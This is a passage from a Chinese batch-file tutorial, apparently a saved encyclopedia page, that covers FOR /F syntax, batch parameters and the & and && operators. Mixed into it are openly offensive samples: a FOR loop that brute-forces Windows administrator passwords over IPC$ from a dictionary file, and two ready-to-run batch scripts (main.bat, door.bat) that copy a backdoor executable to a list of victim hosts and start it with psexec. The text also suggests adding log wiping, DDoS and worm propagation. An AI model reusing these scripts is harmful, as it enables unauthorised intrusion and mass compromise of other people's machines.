📄 bat文件cmd文件_百度百科.htm
字号:
<div class="spctrl"></div> delims=xxx - 指分隔符集。这个替换了空格和跳格键的<br />
<div class="spctrl"></div> 默认分隔符集。<br />
<div class="spctrl"></div> tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代<br />
<div class="spctrl"></div> 的 for 本身。这会导致额外变量名称的<br />
<div class="spctrl"></div> 格式为一个范围。通过 nth 符号指定 m<br />
<div class="spctrl"></div> 符号字符串中的最后一个字符星号,<br />
<div class="spctrl"></div> 那么额外的变量将在最后一个符号解析之<br />
<div class="spctrl"></div> 分配并接受行的保留文本。<br />
<div class="spctrl"></div> usebackq - 指定新语法已在下类情况中使用:<br />
<div class="spctrl"></div> 在作为命令执行一个后引号的字符串并且<br />
<div class="spctrl"></div> 引号字符为文字字符串命令并允许在 fi<br />
<div class="spctrl"></div> 中使用双引号扩起文件名称。<br />
<div class="spctrl"></div> sample1:<br />
<div class="spctrl"></div> FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command<br />
<div class="spctrl"></div> 会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将<br />
<div class="spctrl"></div> 每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或<br />
<div class="spctrl"></div> 空格定界符号。请注意,这个 for 程序体的语句引用 %i 来<br />
<div class="spctrl"></div> 取得第二个符号,引用 %j 来取得第三个符号,引用 %k<br />
<div class="spctrl"></div> 来取得第三个符号后的所有剩余符号。对于带有空格的文件<br />
<div class="spctrl"></div> 名,您需要用双引号将文件名括起来。为了用这种方式来使<br />
<div class="spctrl"></div> 用双引号,您还需要使用 usebackq 选项,否则,双引号会<br />
<div class="spctrl"></div> 被理解成是用作定义某个要分析的字符串的。<br />
<div class="spctrl"></div> %i 专门在 for 语句中得到说明,%j 和 %k 是通过<br />
<div class="spctrl"></div> tokens= 选项专门得到说明的。您可以通过 tokens= 一行<br />
<div class="spctrl"></div> 指定最多 26 个符号,只要不试图说明一个高于字母 z 或<br />
<div class="spctrl"></div> Z 的变量。请记住,FOR 变量是单一字母、分大小写和全局的;<br />
<div class="spctrl"></div> 同时不能有 52 个以上都在使用中。<br />
<div class="spctrl"></div> 您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,<br />
<div class="spctrl"></div> 用单引号将括号之间的 filenameset 括起来。这样,该字符<br />
<div class="spctrl"></div> 串会被当作一个文件中的一个单一输入行。<br />
<div class="spctrl"></div> 最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将<br />
<div class="spctrl"></div> 括号之间的 filenameset 变成一个反括字符串。该字符串会<br />
<div class="spctrl"></div> 被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进<br />
<div class="spctrl"></div> 内存,并被当作文件分析。因此,以下例子:<br />
<div class="spctrl"></div> FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i<br />
<div class="spctrl"></div> 会枚举当前环境中的环境变量名称。<br />
<div class="spctrl"></div> 另外,FOR 变量参照的替换已被增强。您现在可以使用下列<br />
<div class="spctrl"></div> 选项语法:<br />
<div class="spctrl"></div> ~I - 删除任何引号("),扩充 %I<br />
<div class="spctrl"></div> %~fI - 将 %I 扩充到一个完全合格的路径名<br />
<div class="spctrl"></div> %~dI - 仅将 %I 扩充到一个驱动器号<br />
<div class="spctrl"></div> %~pI - 仅将 %I 扩充到一个路径<br />
<div class="spctrl"></div> %~nI - 仅将 %I 扩充到一个文件名<br />
<div class="spctrl"></div> %~xI - 仅将 %I 扩充到一个文件扩展名<br />
<div class="spctrl"></div> %~sI - 扩充的路径只含有短名<br />
<div class="spctrl"></div> %~aI - 将 %I 扩充到文件的文件属性<br />
<div class="spctrl"></div> %~tI - 将 %I 扩充到文件的日期/时间<br />
<div class="spctrl"></div> %~zI - 将 %I 扩充到文件的大小<br />
<div class="spctrl"></div> %~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充<br />
<div class="spctrl"></div> 到找到的第一个完全合格的名称。如果环境变量<br />
<div class="spctrl"></div> 未被定义,或者没有找到文件,此组合键会扩充<br />
<div class="spctrl"></div> 空字符串<br />
<div class="spctrl"></div> 可以组合修饰符来得到多重结果:<br />
<div class="spctrl"></div> %~dpI - 仅将 %I 扩充到一个驱动器号和路径<br />
<div class="spctrl"></div> %~nxI - 仅将 %I 扩充到一个文件名和扩展名<br />
<div class="spctrl"></div> %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名<br />
<div class="spctrl"></div> %~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充<br />
<div class="spctrl"></div> 到找到的第一个驱动器号和路径。<br />
<div class="spctrl"></div> %~ftzaI - 将 %I 扩充到类似输出线路的 DIR<br />
<div class="spctrl"></div> 在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法<br />
<div class="spctrl"></div> 用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名<br />
<div class="spctrl"></div> 比较易读,而且避免与不分大小写的组合键混淆。<br />
<div class="spctrl"></div> 以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。<br />
<div class="spctrl"></div> sample2:<br />
<div class="spctrl"></div> 利用For命令来实现对一台目标Win2k主机的暴力密码破解。<br />
<div class="spctrl"></div> 我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。<br />
<div class="spctrl"></div> 最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"<br />
<div class="spctrl"></div> 用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令--<br />
<div class="spctrl"></div> for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。<br />
<div class="spctrl"></div> sample3:<br />
<div class="spctrl"></div> 你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。<br />
<div class="spctrl"></div> 主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable)<br />
<div class="spctrl"></div> @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k<br />
<div class="spctrl"></div> tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。<br />
<div class="spctrl"></div> 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。<br />
<div class="spctrl"></div> delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。<br />
<div class="spctrl"></div> 代码雏形:<br />
<div class="spctrl"></div> --------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------<br />
<div class="spctrl"></div> @echo off<br />
<div class="spctrl"></div> @if "%1"=="" goto usage<br />
<div class="spctrl"></div> @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k<br />
<div class="spctrl"></div> @goto end<br />
<div class="spctrl"></div> :usage<br />
<div class="spctrl"></div> @echo run this batch in dos modle.or just double-click it.<br />
<div class="spctrl"></div> :end<br />
<div class="spctrl"></div> --------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------<br />
<div class="spctrl"></div> ------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------<br />
<div class="spctrl"></div> @net use \\%1\ipc$ %3 /u:"%2"<br />
<div class="spctrl"></div> @if errorlevel 1 goto failed<br />
<div class="spctrl"></div> @echo Trying to establish the IPC$ connection …………OK<br />
<div class="spctrl"></div> @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt<br />
<div class="spctrl"></div> @psexec \\%1 c:\winnt\system32\windrv32.exe<br />
<div class="spctrl"></div> @psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt<br />
<div class="spctrl"></div> :failed<br />
<div class="spctrl"></div> @echo Sorry can not connected to the victim.<br />
<div class="spctrl"></div> ----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------<br />
<div class="spctrl"></div> 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容<br />
<div class="spctrl"></div> 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. <br />
<div class="spctrl"></div> No.2<br />
<div class="spctrl"></div> 二.如何在批处理文件中使用参数<br />
<div class="spctrl"></div> 批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。<br />
<div class="spctrl"></div> sample1:fomat.bat<br />
<div class="spctrl"></div> @echo off<br />
<div class="spctrl"></div> if "%1"=="a" format a:<br />
<div class="spctrl"></div> :format<br />
<div class="spctrl"></div> @format a:/q/u/auotset<br />
<div class="spctrl"></div> @echo please insert another disk to driver A.<br />
<div class="spctrl"></div> @pause<br />
<div class="spctrl"></div> @goto fomat<br />
<div class="spctrl"></div> 这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^<br />
<div class="spctrl"></div> sample2:<br />
<div class="spctrl"></div> 当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。<br />
<div class="spctrl"></div> @echo off<br />
<div class="spctrl"></div> @net use \\1%\ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。<br />
<div class="spctrl"></div> @if errorlevel 1 echo connection failed<br />
<div class="spctrl"></div> 怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3<br />
<div class="spctrl"></div> 三.如何使用组合命令(Compound Command)<br />
<div class="spctrl"></div> 1.&<br />
<div class="spctrl"></div> Usage:第一条命令 & 第二条命令 [& 第三条命令...]<br />
<div class="spctrl"></div> 用这种方法可以同时执行多条命令,而不管命令是否执行成功<br />
<div class="spctrl"></div> Sample:<br />
<div class="spctrl"></div> C:\>dir z: & dir c:\Ex4rch<br />
<div class="spctrl"></div> The system cannot find the path specified.<br />
<div class="spctrl"></div> Volume in drive C has no label.<br />
<div class="spctrl"></div> Volume Serial Number is 0078-59FB<br />
<div class="spctrl"></div> Directory of c:\Ex4rch<br />
<div class="spctrl"></div> 2002-05-14 23:51 <DIR> .<br />
<div class="spctrl"></div> 2002-05-14 23:51 <DIR> ..<br />
<div class="spctrl"></div> 2002-05-14 23:51 14 sometips.gif<br />
<div class="spctrl"></div> 2.&&<br />
<div class="spctrl"></div> Usage:第一条命令 && 第二条命令 [&& 第三条命令...]<br />
<div class="spctrl"></div> 用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令;<br />
<div class="spctrl"></div> Sample:<br />
<div class="spctrl"></div> C:\>dir z: && dir c:\Ex4rch<br />
<div class="spctrl"></div> The system cannot find the path specified.<br />
<div class="spctrl"></div> C:\>dir c:\Ex4rch && dir z:<br />
<div class="spctrl"></div> Volume in drive C has no label.<br />
<div class="spctrl"></div> Volume Serial Number is 0078-59FB<br />
<div class="spctrl"></div> Directory of c:\Ex4rch<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -